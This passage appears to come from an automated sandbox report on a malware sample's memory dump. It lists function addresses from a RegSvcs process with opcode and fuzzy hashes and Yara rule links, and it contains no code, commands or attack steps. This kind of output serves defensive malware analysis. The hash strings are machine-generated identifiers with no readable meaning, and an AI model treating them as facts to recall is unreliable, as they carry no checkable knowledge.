                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                  • Instruction ID: 46df83b63233b085474f857e93df0659e5381d9ddcf719a81ac04c087134e89e
                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                  • Instruction Fuzzy Hash: 62419275B10205EBDB55DB9ACC84AAFFBBAEF88710F144069ED04A7346DAB0DD0087A1
                                                                  Function 01690887 Relevance: .1, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bad2d6d4b4b9b417ad603079d95ccccac1afe0d9bf9e9849419750dc3ca85a51
                                                                  • Instruction ID: e7d944cdfa914ea367a1c2fe0e01f9c71e121efc554da1d7aaad3ce3389b3039
                                                                  • Opcode Fuzzy Hash: bad2d6d4b4b9b417ad603079d95ccccac1afe0d9bf9e9849419750dc3ca85a51
                                                                  • Instruction Fuzzy Hash: B741D1716007019FEB25CF28CD80A26B7FDFF48314B109A6EE55787A50E730E856CB94
                                                                  Function 016BA470 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e95ff785e058c2eadd133144725a8e93e2372803535706fdbe85dc5ccd7bffab
                                                                  • Instruction ID: b68b00a3d73d900392cdf222ad3be8b535a9bb06a3f57052ed66521d86c16e0b
                                                                  • Opcode Fuzzy Hash: e95ff785e058c2eadd133144725a8e93e2372803535706fdbe85dc5ccd7bffab
                                                                  • Instruction Fuzzy Hash: 1D41BE32981205CFDB21DFA8CC94BEE7BB1FB18324F18415DD512AB391DB759A81CBA4
                                                                  Function 01698BF0 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5cfdfd4aa6ddb27fe3b6dae9b72e8f6546c10eb5f44f61e889b6a8a941cbb7fa
                                                                  • Instruction ID: e127471e3809a712f98adcb10130776d5e41413f144613ddc172c8b393df6107
                                                                  • Opcode Fuzzy Hash: 5cfdfd4aa6ddb27fe3b6dae9b72e8f6546c10eb5f44f61e889b6a8a941cbb7fa
                                                                  • Instruction Fuzzy Hash: 2941D172A4020ACBDB249F58CC40B5EBBBAFB95614F29812ED9029B255C775D842CF90
                                                                  Function 01688918 Relevance: .1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1c72f7fe2771f2a1881cef25ad7881337247e5e2f4da47d6cf587aa8cd4322b
                                                                  • Instruction ID: a54992db65f9aaec5f693f648f53dd719d794b7d011e1d18d9dfd6834821ea97
                                                                  • Opcode Fuzzy Hash: a1c72f7fe2771f2a1881cef25ad7881337247e5e2f4da47d6cf587aa8cd4322b
                                                                  • Instruction Fuzzy Hash: 36415C319093069ED712EF69CC80A6BB7E9EF84B54F400A2EF984D7250E731DE458B97
                                                                  Function 0168A020 Relevance: .1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                  • Instruction ID: bf247d6b0ba6658be822223839bfdd9409484900b032a1c1c80d97437c165a2b
                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                  • Instruction Fuzzy Hash: BB416C31A01211DBDB11EE9C8C887BABBB2EB50759F15836BEE419B341D7329D42CB90
                                                                  Function 016909AD Relevance: .1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0095ad03df5137420204efd6e224e824d0b9222f108d3071df999732833ea5eb
                                                                  • Instruction ID: a95b652f895e533275dd99afeafeab08ed1af13a5f86e1ad1e314df76d0030a7
                                                                  • Opcode Fuzzy Hash: 0095ad03df5137420204efd6e224e824d0b9222f108d3071df999732833ea5eb
                                                                  • Instruction Fuzzy Hash: B1417971A41601EFDB21CF18CC40B26BBE9FF54714F60862EE8598B352E775E942CB94
                                                                  Function 016C0710 Relevance: .1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                  • Instruction ID: f83ab10fd40f5928f1cb45387cde7fb640b2c393fa5109c7cb8011feb5ff6256
                                                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                  • Instruction Fuzzy Hash: 11413B79A01605EFDB24CF98C990ABABBF9FF18B00B10496DE556D7650D330EA44CF60
                                                                  Function 0169262C Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0883c5648b2c5a5d402cb3678286cb3547070f248acb86ec9eb721d9fa51efcc
                                                                  • Instruction ID: ed3060987d68206d35db50662a046cbe3efe48cedb0f4c3f06f969bbd084e037
                                                                  • Opcode Fuzzy Hash: 0883c5648b2c5a5d402cb3678286cb3547070f248acb86ec9eb721d9fa51efcc
                                                                  • Instruction Fuzzy Hash: CE41AFB0942701EFCF21EF28CD50A69B7FAFF45710F1082ADD5069B6A1DB30A941CB91
                                                                  Function 016CC8F9 Relevance: .1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 953e10c3a70d60c26fba67a541d4333eaec9b55d40b5b5170fae9bd468626550
                                                                  • Instruction ID: 247271d554d3202fb3fc9c211c9ea398febe674e2258a0f529e8dd13ba3f5b3f
                                                                  • Opcode Fuzzy Hash: 953e10c3a70d60c26fba67a541d4333eaec9b55d40b5b5170fae9bd468626550
                                                                  • Instruction Fuzzy Hash: AE318DB1A01345DFDB12CF98C840799BBF5FB09B14F2181AED519DB251D3729902CF94
                                                                  Function 017107C3 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfe58a19ded66aa0e827af3b0257721e6417e9017d9e1ce318e932a96a446742
                                                                  • Instruction ID: c9b48a158fd05deeb00da81fdafbf270396694ac8a420565df8a6847b7a1af8b
                                                                  • Opcode Fuzzy Hash: dfe58a19ded66aa0e827af3b0257721e6417e9017d9e1ce318e932a96a446742
                                                                  • Instruction Fuzzy Hash: 4A418E719083059FD320DF29C845B9BFBE8FF88664F108A2EF998D7251D7709944CB92
                                                                  Function 016880A0 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd0c0a0cdc179b10ff3fa259026a53b8fbe8d456567746426a9693b44d5dbc75
                                                                  • Instruction ID: dd2e8c5f14bc710387583793ac2ccadc39059b2f8c6a052fe6ef0035c9fbd660
                                                                  • Opcode Fuzzy Hash: dd0c0a0cdc179b10ff3fa259026a53b8fbe8d456567746426a9693b44d5dbc75
                                                                  • Instruction Fuzzy Hash: 5F41E171A05617AFCB11EF18CD806A8B7BABF54761FA08329D855A7380DF34ED428BD0
                                                                  Function 017105A7 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bebbfd6b625e3face9e296679399bd890144fd0279cbf18110a062372e3b333
                                                                  • Instruction ID: 8be42e6525582ec6cd7388aacc344ee1e4a5bacbb57612311d80931e666090d0
                                                                  • Opcode Fuzzy Hash: 2bebbfd6b625e3face9e296679399bd890144fd0279cbf18110a062372e3b333
                                                                  • Instruction Fuzzy Hash: EF41CF726047469FC320DF6CC840A6AB7E9FFC8700F144A2DF99597684E730E954C7AA
                                                                  Function 01694859 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5de3b9ba8df2aa53f28975242628f075957156df93e9b6318a4ee7ab118e502
                                                                  • Instruction ID: cad3c86e282cd97e5637d2d16b8febb1334b735be6a308e57033b2c9e23a4324
                                                                  • Opcode Fuzzy Hash: b5de3b9ba8df2aa53f28975242628f075957156df93e9b6318a4ee7ab118e502
                                                                  • Instruction Fuzzy Hash: C941C3306043029FDB25DF18DE94B2ABBEEEF80364F14442DEA568B391DB30D852CB91
                                                                  Function 01688B50 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 593be589c3860463012ee5384e68dbbe039ab90525253a17fcdf01bb9cc9f712
                                                                  • Instruction ID: 31105ed1c949b76b26118c119928f069872be6e96414384b912c0e1efa6682d6
                                                                  • Opcode Fuzzy Hash: 593be589c3860463012ee5384e68dbbe039ab90525253a17fcdf01bb9cc9f712
                                                                  • Instruction Fuzzy Hash: 10419DB1A01605CFCB14EF69CD8099DBBF6FF98320B50862ED466A73A0DB34A941CB40
                                                                  Function 016A02E1 Relevance: .1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                  • Instruction ID: f834a1bfaaee00c72de47e81f9c9fd1f0210576e0cb7c1e498b56619a78b14ac
                                                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                  • Instruction Fuzzy Hash: F0310531A04245AFDB12CB6CCC84BABBFE9AF14350F0445A9F855DB352C7749885CBA4
                                                                  Function 0173E3DB Relevance: .1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 525510520d602a48c2e256516ce59cfbd2549975acc388ab0292e8d5adf99caa
                                                                  • Instruction ID: aa1896ac19e129190877cd2b03d5373bdc21408da2c2b7406fb06c62934a6911
                                                                  • Opcode Fuzzy Hash: 525510520d602a48c2e256516ce59cfbd2549975acc388ab0292e8d5adf99caa
                                                                  • Instruction Fuzzy Hash: 1731A631740706ABD7229F658C91FAFB6A9AB99B50F10002CF600AB392DAA4DC00D7E4
                                                                  Function 01744B4B Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81e3b2de494ed0585143ae6f517d676b1ab0a77a1c46359230578e13ff9ae193
                                                                  • Instruction ID: a799d06981730e1dacbca67b2afc46b34cef044fb357230b0046618e740b512c
                                                                  • Opcode Fuzzy Hash: 81e3b2de494ed0585143ae6f517d676b1ab0a77a1c46359230578e13ff9ae193
                                                                  • Instruction Fuzzy Hash: C131CF726452019FC721DF19D880F2AB7E6FB80360F1A846EF9969B752DB30AC40DF95
                                                                  Function 01694260 Relevance: .1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3343d56e3a7def2c1cda9e7ba7760322056313ab897028e612177e59a9e1235
                                                                  • Instruction ID: 0fc7d5a867aa67c7bd9a90beeec64a132e8bf9a8323b0e5d2bb41e33346ae195
                                                                  • Opcode Fuzzy Hash: e3343d56e3a7def2c1cda9e7ba7760322056313ab897028e612177e59a9e1235
                                                                  • Instruction Fuzzy Hash: C541AF75200B45DFDB22CF29CD81B9A7BEAAF45314F10842DE65A8B351CB74E801CBA0
                                                                  Function 01744BB0 Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc48ada9e5d81709db1de432cd347555c6bdd062fe7ae80dfd73848d238a4e7f
                                                                  • Instruction ID: 00209ae3ae3d4d38f7e835db71fe009f3d3283f9818af689483977223fb6d911
                                                                  • Opcode Fuzzy Hash: cc48ada9e5d81709db1de432cd347555c6bdd062fe7ae80dfd73848d238a4e7f
                                                                  • Instruction Fuzzy Hash: 4931AD716043019FD720DF29C880B2AB7E5FB84720F19856DF9969B391E730EC04DB99
                                                                  Function 0170EB1D Relevance: .1, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e88b10b5fa5be680a9822cfad04070133e9438e7733eb72f53d9e3430b99259e
                                                                  • Instruction ID: 9c2b426f35446a8d77c1af088846cbec14515db72475f1c39f3d9f229ee6dc40
                                                                  • Opcode Fuzzy Hash: e88b10b5fa5be680a9822cfad04070133e9438e7733eb72f53d9e3430b99259e
                                                                  • Instruction Fuzzy Hash: 7E31B472201B82DBF327679CCD48F25FBD9BB41B44F1D08A4AB459B6D1DF68D880C664
                                                                  Function 017561C3 Relevance: .1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad13b8bd251b8a19d0127ce60c981ad606b594d53cc559994467e1fbc16b7b1b
                                                                  • Instruction ID: 1e99e2e01014f956af2c2549f1e1b741a541680ef1af667f95b9d0a36d24dd3c
                                                                  • Opcode Fuzzy Hash: ad13b8bd251b8a19d0127ce60c981ad606b594d53cc559994467e1fbc16b7b1b
                                                                  • Instruction Fuzzy Hash: 2D31B275E00256ABDB15DF98CC40BAEF7B6FB44B80F854168F900EB244DBB0AD40CBA4
                                                                  Function 0173483A Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17bd083ec911e680d065ef02d96c251e4f95002f55a4aaf7a4dde4bd1a821e40
                                                                  • Instruction ID: 8fcd4a2d2b4942453f72ab53981dd861886b9f8b39ec19c85ba8710401d64ce6
                                                                  • Opcode Fuzzy Hash: 17bd083ec911e680d065ef02d96c251e4f95002f55a4aaf7a4dde4bd1a821e40
                                                                  • Instruction Fuzzy Hash: 5E316176A4012DABCF21DF54DC88BDEBBBAAB98310F1100E5A509A7251CA34DE91CF90
                                                                  Function 016BEB20 Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4d3eb91d211cc79e1319cf53707791eb174def1c7b994a065692c4d7197ff7c4
                                                                  • Instruction ID: 6618de2dccdd0ad37df0a0770f961bf04c0960ed04e977a232e809bbe1ecb39a
                                                                  • Opcode Fuzzy Hash: 4d3eb91d211cc79e1319cf53707791eb174def1c7b994a065692c4d7197ff7c4
                                                                  • Instruction Fuzzy Hash: 9631C773E00215AFDB21DFA9CD80AEEBBF9EF04750F114469E516D7250D7719E408BA4
                                                                  Function 017560B8 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 689e40eee6e61f9ce66001a974865849a84ff9029477c9515f88febbc3b886a3
                                                                  • Instruction ID: 5b88f2faa6d8b1427de72e2b6ddb16a7a89a95db60ac2f02c3c13d300bd108ae
                                                                  • Opcode Fuzzy Hash: 689e40eee6e61f9ce66001a974865849a84ff9029477c9515f88febbc3b886a3
                                                                  • Instruction Fuzzy Hash: 2331A271A40606ABDB22ABA9CC50B7AF7BAAB44754F50406DF906DB352DAB0DD008B90
                                                                  Function 016907AF Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 893206970513577164efd16eb47da1bb2913e9ee460b9603bd18ad56bfa8efe4
                                                                  • Instruction ID: b6092097391c89da6bc9d7d2a07a1df3123a18a7154cb1238ecf1818ffdf81ac
                                                                  • Opcode Fuzzy Hash: 893206970513577164efd16eb47da1bb2913e9ee460b9603bd18ad56bfa8efe4
                                                                  • Instruction Fuzzy Hash: 6631E872B04612DBCF12DE248D8096BBBEEAF94660F02456DFD569B310DB30DC1187E5
                                                                  Function 01698550 Relevance: .1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a08befd4496e7f488f33a54031161d417161edcea782b16f2c09f1e8e097f6b6
                                                                  • Instruction ID: d63edf41aa9edf0b345eab39676bcae63463b0109e5659118eac831de244ac49
                                                                  • Opcode Fuzzy Hash: a08befd4496e7f488f33a54031161d417161edcea782b16f2c09f1e8e097f6b6
                                                                  • Instruction Fuzzy Hash: 67316FB26093018FE760CF19CC40B6ABBE9FB98710F15496DFA8597391D771E848CBA1
                                                                  Function 016CA6C7 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                  • Instruction ID: f8538031ba2bcd3d9bd6041ba65b1f7729c14932fabd8e5cbb2160319dfba406
                                                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                  • Instruction Fuzzy Hash: 183109B6B00705AFD761CFA9CD40B66BBF8FB08A50B04052DA59AC3791F630E9008B64
                                                                  Function 0173EBD0 Relevance: .1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c6ef57e22061352cf8ad3b4d1f1dc30c90183243228f5fad624c9fa73ae1519
                                                                  • Instruction ID: b72004af12bcbff0d0285e03a82c31d3faf9bd906e53584a097462e2f3760c99
                                                                  • Opcode Fuzzy Hash: 6c6ef57e22061352cf8ad3b4d1f1dc30c90183243228f5fad624c9fa73ae1519
                                                                  • Instruction Fuzzy Hash: F33198B15893019FCB11EF19C54095AFBF2FF89614F4489AEE488AB212E730DD85CF92
                                                                  Function 016B438F Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e583245ed08889ff1df180a1716226caea167d1d05c74a7be42598db630218f
                                                                  • Instruction ID: b8cfd2f861f5baa5cefca193b9a519e26617be5772db8d3356cd4b98088a4e30
                                                                  • Opcode Fuzzy Hash: 5e583245ed08889ff1df180a1716226caea167d1d05c74a7be42598db630218f
                                                                  • Instruction Fuzzy Hash: A031C272B012059FD720DFA8CDC0AAEBBFAFB84304F108569D246D7656DB34E981CB90
                                                                  Function 0168CB7E Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                  • Instruction ID: 2a68e5e7965fbc308f174584a8547bbcdde8cce69e1fc9a5dce71925c59c3bf4
                                                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                  • Instruction Fuzzy Hash: E0210936E0165AAADB109BB98C40BEFBBB6AF14740F058275DE15EB340E370CD0187A0
                                                                  Function 0168C156 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0208e17e9a32721fa5e31180883b3b3b76cf0c89a24a4ea8ec3441b8ed548cc6
